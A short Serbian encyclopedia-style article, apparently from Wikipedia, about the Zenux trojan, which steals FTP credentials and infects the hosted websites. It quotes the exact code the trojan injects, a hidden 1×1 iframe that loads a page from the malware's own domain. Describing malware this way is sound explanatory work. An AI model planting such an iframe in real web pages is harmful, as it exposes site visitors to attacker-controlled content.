# Zenux
Zenux је тројански коњ који заражава рачунаре корисника интернета и краде им кодове за ФТП приступ, после чега инфицира странице сајтова које се налазе на истим ФТП налозима.

## Дејство
Након заражавања рачунара, вирус са рачунара преузима све доступне кодове за ФТП приступ. Након овога улази на одговарајуће ФТП налоге и убацује мало парче кода у странице или темплејте сајтова које се налазе на њима. Елемент који се додаје свакој страници је мали угњеждени фрејм (iframe од енгл. iframe, inline frame) величине 1×1 пиксела, у доњем левом углу странице. Након што је нека страна инфицирана, понаша се као вирусов домаћин.
Тачан код који вирус убацује је:

<!-- ~ --><iframe src="http://zenux.info/info/index.php" width="1" height="1"><!-- ~ -->
Прве пријаве овог вируса су забележене 11. јула 2007. године.